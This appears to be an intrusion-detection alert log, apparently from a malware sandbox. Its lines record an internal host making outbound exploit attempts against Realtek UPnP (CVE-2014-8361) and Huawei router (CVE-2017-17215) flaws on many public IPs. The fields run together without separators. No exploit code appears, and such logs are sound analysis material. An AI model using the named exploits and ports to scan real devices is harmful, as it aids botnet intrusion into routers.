                                                07/20/24-23:05:40.326250TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4659252869192.168.2.1492.177.238.200
                                                07/20/24-23:06:40.959334TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4553452869192.168.2.14209.181.227.2
                                                07/20/24-23:05:39.039721TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4333437215192.168.2.1441.198.124.21
                                                07/20/24-23:05:56.771185TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5197452869192.168.2.14105.54.61.6
                                                07/20/24-23:06:05.864515TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4932852869192.168.2.1472.135.129.227
                                                07/20/24-23:05:35.714639TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5628052869192.168.2.14218.175.31.238
                                                07/20/24-23:05:38.034462TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615047052869192.168.2.1492.177.97.112
                                                07/20/24-23:06:01.842190TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613816252869192.168.2.1460.51.96.114
                                                07/20/24-23:05:40.458812TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25837052869192.168.2.14143.71.98.5
                                                07/20/24-23:05:40.478948TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24239852869192.168.2.14126.4.218.232
                                                07/20/24-23:05:47.556659TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615533652869192.168.2.14149.122.202.24
                                                07/20/24-23:05:52.531304TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25207252869192.168.2.1464.214.151.9
                                                07/20/24-23:06:42.331305TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613682252869192.168.2.14179.77.221.202
                                                07/20/24-23:07:23.347168TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615328852869192.168.2.14211.53.160.252
                                                07/20/24-23:05:52.525575TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24557452869192.168.2.14123.146.160.118
                                                07/20/24-23:05:47.129772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5675237215192.168.2.14157.113.92.240
                                                07/20/24-23:05:38.597370TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614044052869192.168.2.14141.149.116.120
                                                07/20/24-23:05:48.237594TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613503452869192.168.2.14179.206.85.237
                                                07/20/24-23:05:57.922651TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613983052869192.168.2.14194.151.47.138
                                                07/20/24-23:06:03.530128TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5190852869192.168.2.14152.73.13.116
                                                07/20/24-23:05:38.601492TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4748652869192.168.2.1417.18.17.141
                                                07/20/24-23:05:57.540063TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614040252869192.168.2.14128.103.206.27
                                                07/20/24-23:05:52.460913TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24264052869192.168.2.1460.123.7.240
                                                07/20/24-23:06:16.535822TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4990252869192.168.2.1442.171.12.149
                                                07/20/24-23:05:39.187903TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3768452869192.168.2.14203.213.235.166
                                                07/20/24-23:05:40.465472TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23623652869192.168.2.14200.28.88.206
                                                07/20/24-23:06:00.147952TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5069052869192.168.2.1413.115.234.149
                                                07/20/24-23:06:09.610263TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24202252869192.168.2.14201.181.217.132
                                                07/20/24-23:05:40.334659TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25957852869192.168.2.14157.254.149.171
                                                07/20/24-23:05:40.467316TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4463852869192.168.2.1453.127.213.152
                                                07/20/24-23:05:45.389146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4399037215192.168.2.14197.185.228.237
                                                07/20/24-23:06:01.746633TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5416252869192.168.2.1475.115.110.52
                                                07/20/24-23:06:16.939710TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613585052869192.168.2.14104.194.184.102
                                                07/20/24-23:05:45.614327TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613897052869192.168.2.1486.71.169.225
                                                07/20/24-23:06:31.522075TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4146652869192.168.2.1491.134.220.118
                                                07/20/24-23:05:58.417626TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5963252869192.168.2.14100.53.98.16
                                                07/20/24-23:06:05.139331TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5226652869192.168.2.14223.121.185.59
                                                07/20/24-23:07:27.998136TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5659052869192.168.2.1468.208.168.253
                                                07/20/24-23:05:57.523834TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4832252869192.168.2.1497.49.247.112
                                                07/20/24-23:05:58.803048TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4511452869192.168.2.14200.186.146.236
                                                07/20/24-23:05:34.622534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5216037215192.168.2.14197.38.238.183
                                                07/20/24-23:06:02.378063TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5274452869192.168.2.141.81.237.194
                                                07/20/24-23:06:16.164913TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5929052869192.168.2.14164.66.171.183
                                                07/20/24-23:05:57.032993TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6009252869192.168.2.14106.31.240.76
                                                07/20/24-23:05:40.331312TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3801852869192.168.2.14213.189.106.94
                                                07/20/24-23:06:31.391870TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615406452869192.168.2.1486.70.141.165
                                                07/20/24-23:07:07.844201TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615217252869192.168.2.14196.38.105.244
                                                07/20/24-23:05:34.657263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3445237215192.168.2.1441.155.35.213
                                                07/20/24-23:05:36.526908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3922437215192.168.2.14155.169.229.88
                                                07/20/24-23:06:00.055828TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614871652869192.168.2.1450.186.160.203
                                                07/20/24-23:06:06.246694TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614568452869192.168.2.14128.209.120.37
                                                07/20/24-23:05:34.622609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5092837215192.168.2.1475.163.132.69
                                                07/20/24-23:05:39.065904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5173837215192.168.2.14157.28.31.40
                                                07/20/24-23:05:44.327654TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5938452869192.168.2.14142.243.145.171
                                                07/20/24-23:05:45.424851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5428637215192.168.2.1441.148.173.143
                                                07/20/24-23:05:52.485640TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3447252869192.168.2.1472.109.105.60
                                                07/20/24-23:05:59.068836TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3687452869192.168.2.14132.191.29.38
                                                07/20/24-23:05:47.125782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5938037215192.168.2.1418.186.109.95
                                                07/20/24-23:05:36.303495TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4001852869192.168.2.14100.147.99.239
                                                07/20/24-23:06:00.052134TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5832452869192.168.2.14150.193.47.116
                                                07/20/24-23:05:36.325773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3912037215192.168.2.14197.186.233.14
                                                07/20/24-23:05:40.341196TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5928052869192.168.2.14187.211.186.240
                                                07/20/24-23:06:05.199501TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5439452869192.168.2.14116.229.240.238
                                                07/20/24-23:05:48.685807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3352437215192.168.2.14197.250.34.22
                                                07/20/24-23:05:59.280739TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614776252869192.168.2.14152.185.122.165
                                                07/20/24-23:05:59.315621TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5620652869192.168.2.14123.181.87.233
                                                07/20/24-23:06:02.863188TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5135652869192.168.2.14172.49.31.94
                                                07/20/24-23:05:52.570741TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3283052869192.168.2.14174.19.138.99
                                                07/20/24-23:05:56.430318TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613786452869192.168.2.14207.111.101.15
                                                07/20/24-23:05:42.257476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3794237215192.168.2.1441.195.250.71
                                                07/20/24-23:05:52.572723TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4695052869192.168.2.14156.215.77.129
                                                07/20/24-23:05:57.470552TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5296452869192.168.2.1473.169.3.41
                                                07/20/24-23:06:01.003958TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614890452869192.168.2.1462.163.164.84
                                                07/20/24-23:05:37.468948TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24800252869192.168.2.14177.160.195.13
                                                07/20/24-23:05:55.858612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4467237215192.168.2.14197.134.29.158
                                                07/20/24-23:06:02.327173TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4853252869192.168.2.1471.152.254.101
                                                07/20/24-23:05:56.121210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4703837215192.168.2.1441.98.17.104
                                                07/20/24-23:05:33.857328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4655637215192.168.2.14152.41.190.171
                                                07/20/24-23:05:59.348370TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615029852869192.168.2.1465.82.221.155
                                                07/20/24-23:06:00.052134TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3603652869192.168.2.14219.116.120.228
                                                07/20/24-23:05:37.440953TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3937452869192.168.2.1475.120.116.239
                                                07/20/24-23:05:56.404785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4752637215192.168.2.1425.39.95.101
                                                07/20/24-23:06:20.610603TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24960652869192.168.2.1470.112.34.196
                                                07/20/24-23:05:59.400253TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614497252869192.168.2.14176.19.123.19
                                                07/20/24-23:05:45.412131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4785437215192.168.2.1441.125.205.155
                                                07/20/24-23:06:14.572816TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5341452869192.168.2.142.26.84.136
                                                07/20/24-23:06:00.018611TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613296452869192.168.2.14152.108.253.32
                                                07/20/24-23:06:22.982491TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614785252869192.168.2.1443.11.143.126
                                                07/20/24-23:05:38.211354TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5053252869192.168.2.1497.213.55.119
                                                07/20/24-23:06:09.675612TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615002652869192.168.2.14132.43.139.216
                                                07/20/24-23:05:58.195412TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3858052869192.168.2.14123.114.225.162
                                                07/20/24-23:06:13.720163TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4435052869192.168.2.14219.47.45.43
                                                07/20/24-23:05:37.440249TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5775852869192.168.2.14125.66.54.149
                                                07/20/24-23:05:57.466916TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613615652869192.168.2.14135.11.85.84
                                                07/20/24-23:06:23.241818TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3816852869192.168.2.1438.236.106.3
                                                07/20/24-23:05:34.652423TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4600837215192.168.2.14197.164.107.109
                                                07/20/24-23:05:52.468494TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23615252869192.168.2.14184.129.35.32
                                                07/20/24-23:06:08.130839TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614455652869192.168.2.14159.132.96.211
                                                07/20/24-23:05:36.534811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5230437215192.168.2.14157.207.127.188
                                                07/20/24-23:06:01.244191TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5476452869192.168.2.14145.179.60.133
                                                07/20/24-23:06:01.373997TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24166252869192.168.2.1473.142.223.114
                                                07/20/24-23:05:38.449219TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615662452869192.168.2.1468.68.58.116
                                                07/20/24-23:05:40.462908TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23382252869192.168.2.1497.6.189.98
                                                07/20/24-23:05:36.349447TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4987452869192.168.2.1417.150.249.106
                                                07/20/24-23:05:48.756259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4252837215192.168.2.14157.179.53.123
                                                07/20/24-23:05:52.557906TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24126052869192.168.2.14189.78.230.222
                                                07/20/24-23:05:59.361832TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3972652869192.168.2.14164.140.163.126
                                                07/20/24-23:05:59.102064TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615319652869192.168.2.14198.211.160.55
                                                07/20/24-23:07:19.646919TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5555852869192.168.2.14152.17.67.73
                                                07/20/24-23:05:34.644841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5166837215192.168.2.14157.28.53.140
                                                07/20/24-23:05:36.343632TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4859637215192.168.2.14197.66.178.193
                                                07/20/24-23:06:03.123973TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23926852869192.168.2.14197.202.109.233
                                                07/20/24-23:05:58.747598TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25021052869192.168.2.14198.11.216.157
                                                07/20/24-23:05:47.410737TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4606452869192.168.2.1476.156.13.20
                                                07/20/24-23:06:00.693281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4802437215192.168.2.14178.33.9.178
                                                07/20/24-23:05:45.682267TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4908652869192.168.2.1462.30.160.191
                                                07/20/24-23:05:48.197560TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6018452869192.168.2.1491.53.215.210
                                                07/20/24-23:06:32.610184TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613326252869192.168.2.14203.221.19.166
                                                07/20/24-23:05:46.014684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5218437215192.168.2.14197.158.154.146
                                                07/20/24-23:05:37.476343TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23636852869192.168.2.1439.204.207.21
                                                07/20/24-23:05:47.793806TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5178652869192.168.2.1480.197.100.180
                                                07/20/24-23:07:07.975226TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3596652869192.168.2.1477.225.77.218
                                                07/20/24-23:05:36.354373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4346237215192.168.2.14157.85.17.185
                                                07/20/24-23:06:00.164569TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3992052869192.168.2.14103.103.44.62
                                                07/20/24-23:05:45.437584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4847637215192.168.2.14197.60.64.123
                                                07/20/24-23:05:52.639265TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24556652869192.168.2.1439.123.223.174
                                                07/20/24-23:05:34.625708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5966837215192.168.2.1441.17.43.162
                                                07/20/24-23:05:35.981370TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4375452869192.168.2.14103.14.70.39
                                                07/20/24-23:05:36.338927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3308037215192.168.2.14157.19.208.204
                                                07/20/24-23:05:45.409134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5494837215192.168.2.14211.175.159.1
                                                07/20/24-23:05:47.014311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4265437215192.168.2.1441.125.116.67
                                                07/20/24-23:06:01.208471TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615939652869192.168.2.14223.141.195.26
                                                07/20/24-23:06:08.320378TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614178852869192.168.2.14201.181.217.132
                                                07/20/24-23:05:55.877930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3626237215192.168.2.1441.110.21.53
                                                07/20/24-23:06:00.055828TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6079452869192.168.2.14130.216.114.2
                                                07/20/24-23:05:38.939891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5189237215192.168.2.14157.188.24.214
                                                07/20/24-23:06:03.159645TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3380252869192.168.2.14119.180.143.176
                                                07/20/24-23:05:53.423905TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3815652869192.168.2.14220.118.15.248
                                                07/20/24-23:06:08.640698TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24852052869192.168.2.14150.243.199.82
                                                07/20/24-23:05:59.453008TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615890052869192.168.2.14165.137.205.188
                                                07/20/24-23:05:42.145992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5437637215192.168.2.1441.107.118.63
                                                07/20/24-23:05:57.565663TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6027852869192.168.2.1414.105.61.250
                                                07/20/24-23:05:55.889998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3948637215192.168.2.14197.218.241.1
                                                07/20/24-23:06:00.592911TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615238452869192.168.2.14128.122.142.178
                                                07/20/24-23:05:35.839000TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3864652869192.168.2.14223.250.141.64
                                                07/20/24-23:05:57.576576TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615620452869192.168.2.1453.153.197.182
                                                07/20/24-23:06:26.588323TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25534052869192.168.2.14169.13.159.45
                                                07/20/24-23:05:35.447609TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5397252869192.168.2.14183.59.191.208
                                                07/20/24-23:05:36.327823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4708437215192.168.2.14197.158.187.122
                                                07/20/24-23:05:59.315621TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25468252869192.168.2.14113.77.223.1
                                                07/20/24-23:05:36.258778TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4320652869192.168.2.1465.155.38.231
                                                07/20/24-23:06:22.041924TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26006652869192.168.2.14178.70.56.53
                                                07/20/24-23:05:59.449873TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614826452869192.168.2.14122.206.97.7
                                                07/20/24-23:06:15.532287TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26068452869192.168.2.14174.109.92.117
                                                07/20/24-23:05:47.758558TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5822052869192.168.2.14172.124.74.59
                                                07/20/24-23:05:47.127325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4880037215192.168.2.14221.219.36.38
                                                07/20/24-23:05:34.652423TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4809437215192.168.2.14157.153.180.139
                                                07/20/24-23:05:33.862992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5727437215192.168.2.1492.57.180.103
                                                07/20/24-23:05:45.582882TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614709252869192.168.2.14126.177.224.75
                                                07/20/24-23:05:47.044038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6016437215192.168.2.14197.207.224.61
                                                07/20/24-23:05:57.334876TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25752452869192.168.2.14108.121.255.112
                                                07/20/24-23:05:37.540433TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25780052869192.168.2.14143.50.74.208
                                                07/20/24-23:05:37.527690TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24360652869192.168.2.141.23.28.195
                                                07/20/24-23:06:03.037561TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615327452869192.168.2.14153.97.3.129
                                                07/20/24-23:05:48.841499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5628637215192.168.2.14117.101.213.42
                                                07/20/24-23:05:57.500342TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24352852869192.168.2.14109.75.221.193
                                                07/20/24-23:05:48.186768TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5058252869192.168.2.1434.107.33.161
                                                07/20/24-23:05:59.457721TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23312852869192.168.2.14107.221.240.37
                                                07/20/24-23:06:05.685688TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3387452869192.168.2.1478.124.39.8
                                                07/20/24-23:05:39.062924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3405837215192.168.2.14157.195.87.114
                                                07/20/24-23:05:50.479091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3369437215192.168.2.14197.149.58.3
                                                07/20/24-23:05:37.456840TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24634852869192.168.2.14116.137.1.46
                                                07/20/24-23:05:39.919214TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3303052869192.168.2.14172.234.119.46
                                                07/20/24-23:06:03.136885TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24114652869192.168.2.14143.185.187.241
                                                07/20/24-23:06:14.535864TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5183252869192.168.2.14192.125.129.180
                                                07/20/24-23:06:31.826739TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5618052869192.168.2.14104.60.110.252
                                                07/20/24-23:06:06.269587TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5659252869192.168.2.1499.117.47.20
